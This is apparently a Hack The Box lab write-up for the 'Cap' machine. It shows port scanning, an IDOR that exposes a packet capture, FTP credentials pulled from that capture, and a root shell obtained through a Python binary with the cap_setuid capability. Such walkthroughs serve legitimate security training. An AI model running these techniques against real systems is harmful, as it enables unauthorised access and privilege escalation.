Cap

#easy #linux #idor #capabilities

https://app.hackthebox.com/machines/Cap

Enumeration

sudo nmap -p- -sS --open --min-rate 5000 -Pn -n -vv 10.10.10.245 -oA openPorts
PORT   STATE SERVICE REASON
21/tcp open  ftp     syn-ack ttl 63
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63
cat openPorts.gnmap | grep -oP '\d{1,5}/open' | awk '{print $1}' FS='/' | xargs | tr ' ' ','
nmap -p 21,22,80 -sCV -Pn 10.10.10.245 -oA targeted
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
|   256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_  256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open  http    Gunicorn
|_http-title: Security Dashboard
|_http-server-header: gunicorn
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Wappalyzer

http://10.10.10.245/

IDOR

IDOR

http://10.10.10.245/data/0

Click on Download

Open file 0.pcap with Wireshark

Filter

ftp.request.command == USER or ftp.request.command == PASS

USER: nathan PASSWORD: Bu***********3!

FTP

ftp 10.10.10.245
Connected to 10.10.10.245.
220 (vsFTPd 3.0.3)
Name (10.10.10.245:kali): nathan
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||56796|)
150 Here comes the directory listing.
drwxr-xr-x    3 1001     1001         4096 Jun 18 16:09 snap
-r--------    1 1001     1001           33 Jun 18 16:06 user.txt
226 Directory send OK.
ftp> more user.txt
a36e************************b7c0

SSH

ssh nathan@10.10.10.245
nathan@cap:~$ ls
snap  user.txt
nathan@cap:~$ cat user.txt
a36e************************b7c0

Privilege Escalation

nathan@cap:~$ getcap -r / 2>/dev/null
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep

CAP_SETUID

CAP_SETUID/SETGID Capabilities

nathan@cap:~$ /usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/sh")'
# cd /root
# ls
root.txt  snap
# cat root.txt
4288************************7036
PreviousHack The BoxNextEvaluative

Last updated